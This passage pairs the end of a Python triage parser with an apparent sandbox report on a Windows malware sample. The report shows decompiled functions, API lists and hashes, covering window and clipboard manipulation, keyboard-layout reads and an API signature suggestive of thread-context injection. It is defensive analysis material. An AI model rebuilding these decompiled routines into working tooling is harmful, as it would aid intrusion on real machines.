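    return [{"api_id": a, "string_id": s, "tokens": tokenize(a),
             "capabilities": classify(a, s)}
            for a, s in parse_signatures(report_text)]


def capability_summary(report_text):
    """Sorted union of capabilities seen across all function blocks."""
    return sorted({c for e in triage(report_text) for c in e["capabilities"]})


if __name__ == "__main__":
    for entry in triage(SAMPLE_REPORT):
        print(", ".join(entry["capabilities"]) or "-", "<-", entry["api_id"][:50])
    print("sample capabilities:", capability_summary(SAMPLE_REPORT))
```

Run against a full text export of the report, the same parser picks up every function block; the rules deliberately require a combination of API words plus a string (the Profiles\ path, the Authenticode OID, AdjustTokenPrivileges) where a single API alone would be too common to be meaningful, and the negative lookbehind keeps the "API String ID" hash lines from being mistaken for string lists.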

                                          C-Code - Quality: 16%
                                          			E00C7FAD4(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9) {
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				void* __r12;
                                          				int _t31;
                                          				intOrPtr _t34;
                                          				intOrPtr _t36;
                                          				void* _t50;
                                          				int _t60;
                                          				intOrPtr* _t63;
                                          				long long _t66;
                                          				intOrPtr _t68;
                                          				unsigned int* _t95;
                                          				void* _t100;
                                          				intOrPtr* _t102;
                                          				intOrPtr* _t103;
                                          				void* _t105;
                                          				void* _t107;
                                          				void* _t108;
                                          				intOrPtr* _t111;
                                          				void* _t119;
                                          				long _t121;
                                          				long _t123;
                                          				long long _t124;
                                          				intOrPtr* _t126;
                                          				void* _t127;
                                          				intOrPtr* _t128;
                                          
                                          				_t63 = __rax;
                                          				 *((long long*)(_t107 + 8)) = __rbx;
                                          				 *((long long*)(_t107 + 0x18)) = __r8;
                                          				_push(_t105);
                                          				_push(_t103);
                                          				_push(_t119);
                                          				_t108 = _t107 - 0x40;
                                          				_t124 = __r8;
                                          				_t100 = __rdx;
                                          				_t60 = 0;
                                          				r8d = 0x10000;
                                          				 *((intOrPtr*)(_t108 + 0x98)) = 0;
                                          				r13d = 0;
                                          				HeapAlloc(_t127, _t123, _t121);
                                          				_t128 = __rax;
                                          				if(__rax != 0) {
                                          					__imp__StrTrimW();
                                          					__imp__StrTrimW();
                                          					_t31 = lstrlenW(??);
                                          					 *(_t108 + 0x30) = _t31;
                                          					r12d = _t31;
                                          					 *((intOrPtr*)(_t108 + 0x28)) = lstrlenW(??);
                                          					E00C80764(_t50, __rax, __rcx, __rcx, _t103, _t105, __r8);
                                          					 *((long long*)(_t108 + 0x38)) = _t63;
                                          					_t66 = _t63;
                                          					if(_t63 != 0) {
                                          						E00C652A4();
                                          						_t60 =  ==  ? 1 : 0;
                                          						 *((intOrPtr*)(_t108 + 0x98)) = _t60;
                                          					}
                                          					r9d = 0x10000;
                                          					_t111 = _t128;
                                          					_t34 = E00C7FFA8(_t63, _t66, _t100, _t124, _t111);
                                          					 *((intOrPtr*)(_t108 + 0x20)) = _t34;
                                          					r14d = _t34;
                                          					if(_t34 != 0) {
                                          						L23:
                                          						if(_t66 != 0) {
                                          							if(_t60 != 0) {
                                          								E00C6528C();
                                          							}
                                          							CloseHandle();
                                          						}
                                          						goto L27;
                                          					} else {
                                          						if(_t66 == 0) {
                                          							L27:
                                          							HeapFree();
                                          							_t36 = r14d;
                                          							goto L28;
                                          						}
                                          						E00C803EC(_t63, _t66, _t100);
                                          						_t126 = _t63;
                                          						if(_t63 == 0) {
                                          							L22:
                                          							r14d =  *((intOrPtr*)(_t108 + 0x20));
                                          							goto L23;
                                          						}
                                          						_t68 =  *((intOrPtr*)(_t108 + 0x90));
                                          						do {
                                          							_t102 = _t126;
                                          							_t126 =  *_t126;
                                          							if( *((long long*)(_t102 + 8)) == 0) {
                                          								goto L18;
                                          							}
                                          							_t95 =  *((intOrPtr*)(_t102 + 0x10));
                                          							r8d = r12d;
                                          							r12d = _t105 + 2;
                                          							 *((long long*)(_t108 + 0x28)) = _t95 + (_t111 + 2) * 2;
                                          							r12d = r12d + ( *_t95 >> 1) - r12d;
                                          							if(r13d >= r12d) {
                                          								L15:
                                          								if(_t103 != 0) {
                                          									lstrcpyW();
                                          									r9d = 0x10000;
                                          									E00C801BC(_t68,  *((intOrPtr*)(_t102 + 8)), _t103, _t102, _t103, _t128, _t119);
                                          								}
                                          								L17:
                                          								CloseHandle();
                                          								r12d =  *(_t108 + 0x30);
                                          								goto L18;
                                          							}
                                          							if(_t103 != 0) {
                                          								HeapFree();
                                          							}
                                          							r8d = r12d;
                                          							r13d = r12d;
                                          							HeapAlloc(??, ??, ??);
                                          							_t103 = _t63;
                                          							if(_t63 != 0) {
                                          								lstrcpyW();
                                          								goto L15;
                                          							} else {
                                          								r13d = 0;
                                          								goto L17;
                                          							}
                                          							L18:
                                          							if( *((intOrPtr*)(_t102 + 0x10)) != 0) {
                                          								HeapFree();
                                          							}
                                          							_t111 = _t102;
                                          							HeapFree(??, ??, ??);
                                          						} while (_t126 != 0);
                                          						_t66 =  *((intOrPtr*)(_t108 + 0x38));
                                          						_t60 =  *((intOrPtr*)(_t108 + 0x98));
                                          						goto L22;
                                          					}
                                          				} else {
                                          					_t4 = _t103 + 8; // 0x8
                                          					_t36 = _t4;
                                          					L28:
                                          					return _t36;
                                          				}
                                          			}

                                          APIs
                                          • HeapAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB13
                                          • StrTrimW.SHLWAPI(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB33
                                          • StrTrimW.SHLWAPI(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB43
                                          • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB4D
                                          • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB5D
                                          • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FC2D
                                          • HeapAlloc.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FC45
                                          • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FC94
                                          • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FCB1
                                          • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FCC3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$AllocTrimlstrlen$CloseHandle
                                          • String ID:
                                          • API String ID: 3944168048-0
                                          • Opcode ID: 409e000f26243f0af7133e79178066b0551e3b14de60c6b035731291dcf1e78f
                                          • Instruction ID: 6547e8a2e5090547b215276187c93e55416209bd50e06e009b45843de4583042
                                          • Opcode Fuzzy Hash: 409e000f26243f0af7133e79178066b0551e3b14de60c6b035731291dcf1e78f
                                          • Instruction Fuzzy Hash: A251E065200B8482FB25DF22E89476A77A0FB88FD4F44C1289E4E47B29DF3CC58AC704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 15%
                                          			E00C82F5C(void* __eflags, long long __rbx, signed int __rcx, long long __rsi, void* __r8, void* __r9) {
                                          				void* __rbp;
                                          				void* _t85;
                                          				int _t86;
                                          				intOrPtr _t97;
                                          				signed long long _t101;
                                          				intOrPtr _t104;
                                          				signed int _t112;
                                          				long long _t121;
                                          				signed int _t122;
                                          				void* _t139;
                                          				WNDCLASSA* _t141;
                                          				signed int _t142;
                                          				long long _t144;
                                          				struct HWND__* _t146;
                                          				void* _t147;
                                          				void* _t149;
                                          				void* _t150;
                                          				void* _t154;
                                          				CHAR* _t156;
                                          				long long _t157;
                                          
                                          				_t154 = __r9;
                                          				_t152 = __r8;
                                          				_t144 = __rsi;
                                          				_t123 = __rbx;
                                          				 *((long long*)(_t149 + 0x10)) = __rbx;
                                          				 *((long long*)(_t149 + 0x18)) = __rsi;
                                          				_t147 = _t149 - 0x47;
                                          				_t150 = _t149 - 0x100;
                                          				_t142 = __rcx;
                                          				 *((intOrPtr*)(_t147 + 0x67)) =  *((intOrPtr*)(__rcx + 0x778));
                                          				_t112 = 0;
                                          				E00C77DBC(_t147 + 0x67, _t147 + 0x17);
                                          				 *(_t147 - 0x39) =  *(_t147 - 0x39) & 0;
                                          				 *(_t147 - 0x29) =  *(_t147 - 0x29) & 0;
                                          				 *(_t147 - 0x25) =  *(_t147 - 0x25) & 0;
                                          				 *((long long*)(_t147 - 0x31)) = E00C83848;
                                          				GetModuleHandleA(_t156);
                                          				 *((long long*)(_t147 - 0x21)) = E00C83848;
                                          				asm("xorps xmm0, xmm0");
                                          				asm("movdqa [ebp-0x19], xmm0");
                                          				asm("xorps xmm1, xmm1");
                                          				 *((long long*)(_t147 + 7)) = _t147 + 0x17;
                                          				asm("movdqa [ebp-0x9], xmm1");
                                          				RegisterClassA(_t141);
                                          				_t121 = "Tahoma";
                                          				r9d = 0;
                                          				 *((long long*)(_t150 + 0x68)) = _t121;
                                          				 *(_t150 + 0x60) =  *(_t150 + 0x60) & 0;
                                          				r8d = 0;
                                          				 *(_t150 + 0x58) =  *(_t150 + 0x58) & 0;
                                          				 *(_t150 + 0x50) =  *(_t150 + 0x50) & 0;
                                          				 *(_t150 + 0x48) =  *(_t150 + 0x48) & 0;
                                          				 *((intOrPtr*)(_t150 + 0x40)) = 0xee;
                                          				 *(_t150 + 0x38) =  *(_t150 + 0x38) & 0;
                                          				 *(_t150 + 0x30) =  *(_t150 + 0x30) & 0;
                                          				 *(_t150 + 0x28) =  *(_t150 + 0x28) & 0;
                                          				 *((intOrPtr*)(_t150 + 0x20)) = 0x190;
                                          				CreateFontA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                          				r8d = 0;
                                          				 *((long long*)(_t142 + 0x180)) = _t121;
                                          				E00C7B940(_t121, __rbx, _t147 - 0x39, "Shell_TrayWnd", __rsi, _t147, __r8);
                                          				r8d = 0;
                                          				 *((long long*)(_t142 + 0x188)) = _t121;
                                          				_t157 = _t121;
                                          				E00C7B940(_t121, _t123, _t121, "ReBarWindow32", _t144, _t147, _t152);
                                          				r8d = 0;
                                          				 *((long long*)(_t142 + 0x190)) = _t121;
                                          				E00C7B940(_t121, _t121,  *((intOrPtr*)(_t142 + 0x188)), "TrayNotifyWnd", _t144, _t147, _t152);
                                          				_t139 = _t147 - 0x49;
                                          				 *((long long*)(_t142 + 0x198)) = _t121;
                                          				GetWindowRect(_t146);
                                          				_t85 = E00C7BE5C();
                                          				if(_t85 != 1) {
                                          					_t97 =  *((intOrPtr*)(_t147 - 0x41));
                                          					if(_t85 != 2) {
                                          						r8d =  *(_t147 - 0x3d);
                                          						r10d =  *(_t147 - 0x45);
                                          						r9d =  *((intOrPtr*)(_t147 - 0x49));
                                          					} else {
                                          						_t53 = _t121 + 1; // 0x1
                                          						r9d = _t53;
                                          						r8d =  *0xc95510; // 0x1e
                                          						_t97 = _t97 -  *((intOrPtr*)(_t147 - 0x49)) - r9d;
                                          						r10d =  *(_t147 - 0x3d);
                                          						r8d = r8d + 0xfffffffb;
                                          						r8d = r8d + r10d;
                                          					}
                                          				} else {
                                          					r8d =  *(_t147 - 0x3d);
                                          					r8d = r8d -  *(_t147 - 0x45);
                                          					_t101 =  *0xc95510; // 0x1e
                                          					if(r8d > _t101) {
                                          						r8d = r8d - _t101;
                                          						r8d = _t101;
                                          						asm("cdq");
                                          						_t112 = r8d >> 1;
                                          					}
                                          					r9d =  *((intOrPtr*)(_t147 - 0x41));
                                          					_t104 =  *0xc95514; // 0x1e
                                          					r8d = r8d - (0x66666667 * r8d >> 0x20 >> 2) + (0x66666667 * r8d >> 0x20 >> 2 >> 0x1f);
                                          					_t97 = _t104 + 0xfffffffb + r9d;
                                          					r8d = r8d + _t112;
                                          					r10d = _t144 + _t139;
                                          				}
                                          				_t122 =  *((intOrPtr*)(_t147 - 0x21));
                                          				 *(_t150 + 0x58) = _t142;
                                          				 *(_t150 + 0x50) = _t122;
                                          				r8d = r8d - r10d;
                                          				 *(_t150 + 0x48) =  *(_t150 + 0x48) & 0x00000000;
                                          				 *((long long*)(_t150 + 0x40)) = _t157;
                                          				 *(_t150 + 0x38) = r8d;
                                          				 *(_t150 + 0x30) = _t97 - r9d;
                                          				 *(_t150 + 0x28) = r10d;
                                          				 *((intOrPtr*)(_t150 + 0x20)) = r9d;
                                          				r9d = 0x54010000;
                                          				_t86 = CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                          				 *(_t142 + 0x178) = _t122;
                                          				if(_t122 != 0) {
                                          					r9d = 0;
                                          					r8d = 0x3e8;
                                          					_t70 = _t154 + 0x64; // 0x64
                                          					SetTimer(??, ??, ??, ??);
                                          					r9d = 0;
                                          					r8d = _t70;
                                          					_t86 = SetTimer(??, ??, ??, ??);
                                          				}
                                          				return _t86;
                                          			}

                                          APIs
                                            • Part of subcall function 00C77DBC: wsprintfA.USER32 ref: 00C77E0C
                                          • GetModuleHandleA.KERNEL32 ref: 00C82FA7
                                          • RegisterClassA.USER32 ref: 00C82FCD
                                          • CreateFontA.GDI32 ref: 00C83016
                                            • Part of subcall function 00C7B940: FindWindowExA.USER32 ref: 00C7B986
                                            • Part of subcall function 00C7B940: Sleep.KERNEL32(?,?,?,00C68A63,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7B975
                                          • GetWindowRect.USER32 ref: 00C8307E
                                            • Part of subcall function 00C7BE5C: GetWindowRect.USER32 ref: 00C7BE65
                                          • CreateWindowExA.USER32 ref: 00C83159
                                          • SetTimer.USER32 ref: 00C8317D
                                          • SetTimer.USER32 ref: 00C83193
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$CreateRectTimer$ClassFindFontHandleModuleRegisterSleepwsprintf
                                          • String ID: ReBarWindow32$Shell_TrayWnd$Tahoma$TrayNotifyWnd$gfff
                                          • API String ID: 522669638-365627327
                                          • Opcode ID: 1a8775feb051e10ab7119c5e8995331f8012d64879da011d2dae2137674834c5
                                          • Instruction ID: 1487b1d9a03b7b908351295bce41e35ed92f26b8b2e3c8ca0d60c768344e56c6
                                          • Opcode Fuzzy Hash: 1a8775feb051e10ab7119c5e8995331f8012d64879da011d2dae2137674834c5
                                          • Instruction Fuzzy Hash: 17618B33B24A908BE724CF65E841B9D77B5F348B98F509219EA8A53E18DF38D614CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$Context$AllocErrorLastMemoryProcessResumeSleepSuspendVirtualWritememcpymemset
                                          • String ID: @
                                          • API String ID: 1761926231-2766056989
                                          • Opcode ID: 1cc2922956f305c59228975e9a9a445e1337bdd3054dbf68854302a85569a418
                                          • Instruction ID: 61be7e2b05d5d784082012778ddc027db4d0d0aa5432ba31433a734fc91cf084
                                          • Opcode Fuzzy Hash: 1cc2922956f305c59228975e9a9a445e1337bdd3054dbf68854302a85569a418
                                          • Instruction Fuzzy Hash: 4A316232304F45D6EB64CF12E894B9AB364F788B84F808525DB9E47B64EF38C559C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StrRChrW.SHLWAPI(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63CB8
                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63CDE
                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63D2B
                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63D37
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63D59
                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63DB1
                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63E24
                                          • HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63ED4
                                          • HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63EEC
                                          • HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63F04
                                          • HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63F1C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap$ByteCharMultiWidelstrcmpilstrlen
                                          • String ID:
                                          • API String ID: 2788117228-0
                                          • Opcode ID: 353940b687fbbd0efc4b0573de4e8962611e655daa13c303d173d90becb156e5
                                          • Instruction ID: 3037e83ac761e8f6ba42174badfbd5a27007247cbe87916347f040e1928869cd
                                          • Opcode Fuzzy Hash: 353940b687fbbd0efc4b0573de4e8962611e655daa13c303d173d90becb156e5
                                          • Instruction Fuzzy Hash: 3381C132600BC186EB349F7198847A973A1FB44FA8F488325EE6667B95DF34C786C304
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 43%
                                          			E00C83CC0(void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
                                          				int _t15;
                                          				int _t26;
                                          				void* _t43;
                                          				void* _t68;
                                          				long long _t75;
                                          				void* _t76;
                                          				void* _t78;
                                          
                                          				_t43 = _t78;
                                          				 *((long long*)(_t43 + 8)) = __rbx;
                                          				 *((long long*)(_t43 + 0x10)) = _t75;
                                          				 *((long long*)(_t43 + 0x18)) = __rsi;
                                          				 *((long long*)(_t43 + 0x20)) = __rdi;
                                          				_t76 = r8d;
                                          				_t68 = __rcx;
                                          				E00C7F480(__rbx, __rcx);
                                          				_t45 = _t43;
                                          				if(_t43 == 0) {
                                          					L8:
                                          					GetLastActivePopup();
                                          					goto L9;
                                          				} else {
                                          					_t74 = _t68 + 0x88;
                                          					if(E00C7C050(_t43, _t45, _t68 + 0x88, _t43, _t68 + 0x88) == 0 || E00C7C134(_t45, _t45) == 0) {
                                          						goto L8;
                                          					} else {
                                          						_t26 = IsIconic();
                                          						_t37 = _t26;
                                          						if(_t26 != 0) {
                                          							goto L8;
                                          						} else {
                                          							_t66 = _t45;
                                          							E00C7BA38(_t37, _t43, _t45, _t74, _t45, _t74, __r8, __r9);
                                          							_t38 = _t43;
                                          							if(_t43 != 0) {
                                          								_t66 = _t43;
                                          								_t45 = _t43;
                                          								E00C7C170(_t38, _t43, _t43, _t68, _t43, _t74, _t76, __r8, __r9);
                                          							}
                                          							E00C7BD68(_t45, _t66);
                                          							if(_t43 != 0) {
                                          								L9:
                                          								_t45 = _t43;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t15 = OpenClipboard();
                                          				if(_t15 != 0) {
                                          					GlobalAlloc();
                                          					if(_t43 != 0) {
                                          						GlobalLock();
                                          						memcpy(??, ??, ??);
                                          						 *((char*)(_t76 + _t43)) = 0;
                                          						GlobalUnlock(??);
                                          						if(EmptyClipboard() != 0) {
                                          							SetClipboardData();
                                          						}
                                          						GlobalFree();
                                          					}
                                          					_t15 = CloseClipboard();
                                          				}
                                          				return _t15;
                                          			}

                                          APIs
                                          • IsIconic.USER32 ref: 00C83D14
                                            • Part of subcall function 00C7BA38: GetWindowLongPtrA.USER32 ref: 00C7BA6C
                                            • Part of subcall function 00C7BA38: GetLastActivePopup.USER32 ref: 00C7BA80
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BA9D
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAAB
                                            • Part of subcall function 00C7BA38: GetWindowInfo.USER32 ref: 00C7BAC4
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAD2
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB1B
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB2F
                                            • Part of subcall function 00C7C170: GetWindowLongPtrA.USER32 ref: 00C7C1B7
                                            • Part of subcall function 00C7C170: GetAncestor.USER32 ref: 00C7C1CC
                                            • Part of subcall function 00C7C170: GetWindowThreadProcessId.USER32 ref: 00C7C211
                                            • Part of subcall function 00C7C170: GetWindowThreadProcessId.USER32 ref: 00C7C23D
                                            • Part of subcall function 00C7C170: GetCurrentThreadId.KERNEL32 ref: 00C7C245
                                            • Part of subcall function 00C7C170: AttachThreadInput.USER32 ref: 00C7C25B
                                            • Part of subcall function 00C7C170: BringWindowToTop.USER32 ref: 00C7C264
                                            • Part of subcall function 00C7C170: SetForegroundWindow.USER32 ref: 00C7C26D
                                            • Part of subcall function 00C7C170: SetActiveWindow.USER32 ref: 00C7C276
                                            • Part of subcall function 00C7C170: SetFocus.USER32 ref: 00C7C27F
                                            • Part of subcall function 00C7C170: AttachThreadInput.USER32 ref: 00C7C290
                                            • Part of subcall function 00C7C170: SetWindowPos.USER32 ref: 00C7C2BC
                                          • GetLastActivePopup.USER32 ref: 00C83D52
                                          • OpenClipboard.USER32 ref: 00C83D5E
                                          • GlobalAlloc.KERNEL32 ref: 00C83D76
                                          • GlobalLock.KERNEL32 ref: 00C83D87
                                          • memcpy.NTDLL ref: 00C83D99
                                          • GlobalUnlock.KERNEL32 ref: 00C83DA6
                                          • EmptyClipboard.USER32 ref: 00C83DAC
                                          • SetClipboardData.USER32 ref: 00C83DBE
                                          • GlobalFree.KERNEL32 ref: 00C83DC7
                                          • CloseClipboard.USER32 ref: 00C83DCD
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                            • Part of subcall function 00C7C134: IsWindowVisible.USER32 ref: 00C7C141
                                            • Part of subcall function 00C7C134: GetWindowLongPtrA.USER32 ref: 00C7C153
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Thread$ClipboardGlobal$ActiveLong$AncestorAttachInputLastPopupProcess$AllocBringCloseCurrentDataEmptyFocusForegroundFreeIconicInfoLockOpenUnlockVisiblememcpy
                                          • String ID:
                                          • API String ID: 1754987310-0
                                          • Opcode ID: 673b9f61747a7b65ccbe8144bdd32e1e4f630637ef949e179fcd102509c62865
                                          • Instruction ID: fed3daa6238929a0617b9874d0347530aa6c6695ed49b5829584cd66c29c0cd1
                                          • Opcode Fuzzy Hash: 673b9f61747a7b65ccbe8144bdd32e1e4f630637ef949e179fcd102509c62865
                                          • Instruction Fuzzy Hash: B231941131278182FE14AB23AD5476A63A1BB89FC5F489139DE1E4BB55EF3CC6068318
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 15%
                                          			E00C83460(void* __edx, void* __edi, long long __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r14, long long _a8, long long _a16, long long _a24) {
                                          				void* _v8;
                                          				void* _v536;
                                          				void* _v552;
                                          				intOrPtr _v556;
                                          				intOrPtr _v560;
                                          				void* _v568;
                                          				intOrPtr _v580;
                                          				intOrPtr _v584;
                                          				void* __rdi;
                                          				int _t28;
                                          				void* _t56;
                                          				long long _t57;
                                          				void* _t59;
                                          				intOrPtr _t78;
                                          				long long _t79;
                                          				intOrPtr _t81;
                                          				void* _t91;
                                          
                                          				_t91 = __r14;
                                          				_t57 = __rax;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t78 =  *((intOrPtr*)(__rcx + 0x190));
                                          				_t59 = __rcx;
                                          				_t81 =  *((intOrPtr*)(__rcx + 0x198));
                                          				if(__edx != 0x64) {
                                          					__eflags = __edx - 0x65;
                                          					if(__edx == 0x65) {
                                          						_t28 = E00C7F480(__rcx, __rcx);
                                          						__eflags =  *((intOrPtr*)(_t59 + 0x178)) - _t57;
                                          						if( *((intOrPtr*)(_t59 + 0x178)) != _t57) {
                                          							GetWindowThreadProcessId();
                                          							_t28 = GetKeyboardLayout(??);
                                          							_t79 = _t57;
                                          							__eflags =  *((intOrPtr*)(_t59 + 0x150)) - _t57;
                                          							if( *((intOrPtr*)(_t59 + 0x150)) != _t57) {
                                          								r8d = 0x104;
                                          								L00C87402();
                                          								r9d = 0x104;
                                          								GetLocaleInfoW(??, ??, ??, ??);
                                          								CharUpperBuffW(??, ??);
                                          								r8d = 4;
                                          								memcpy(??, ??, ??);
                                          								 *((long long*)(_t59 + 0x150)) = _t79;
                                          								goto L10;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					GetWindowRect();
                                          					GetWindowRect(??, ??);
                                          					GetWindowRect(??, ??);
                                          					if(E00C7BE5C() != 1) {
                                          						__eflags = _v580 - _v556 -  *0xc95510; // 0x1e
                                          					} else {
                                          						_t56 = _v584 - _v560 -  *0xc95514; // 0x1e
                                          					}
                                          					if(_t56 >= 0) {
                                          						L10:
                                          						r9d = 0x501;
                                          						r8d = 0;
                                          						__eflags = 0;
                                          						_t28 = RedrawWindow(??, ??, ??, ??);
                                          					} else {
                                          						E00C831B4(_t56, _t59, _t59, _t78, _t81, _t91);
                                          						r9d = 0x501;
                                          						r8d = 0;
                                          						RedrawWindow(??, ??, ??, ??);
                                          						_t28 = E00C832C0(0, _t56, _t57, _t59, _t59, _t81);
                                          					}
                                          				}
                                          				return _t28;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Rect$Redraw$BuffCharInfoKeyboardLayoutLocaleProcessThreadUppermemcpy
                                          • String ID:
                                          • API String ID: 241760697-0
                                          • Opcode ID: b27478d8b1a071e956e4b8695433fd4f216d61e4f1b932a4897c1fda21cfaeab
                                          • Instruction ID: 4846769770eb8c3f05ddff9885e38aa374f61d6e417caa5b34ee1ae54f76fad9
                                          • Opcode Fuzzy Hash: b27478d8b1a071e956e4b8695433fd4f216d61e4f1b932a4897c1fda21cfaeab
                                          • Instruction Fuzzy Hash: F5317335304A90C6EB10EB25E488BAD6771F7C5F88F949531EE4A47B58CF79C64ACB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,00C7FAAC,?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C82E7B
                                          • GetModuleHandleW.KERNEL32(?,?,?,?,00C7FAAC,?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C82E88
                                          • GetProcAddress.KERNEL32(?,?,?,?,00C7FAAC,?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C82EA4
                                          • NtQuerySystemInformation.NTDLL ref: 00C82ECE
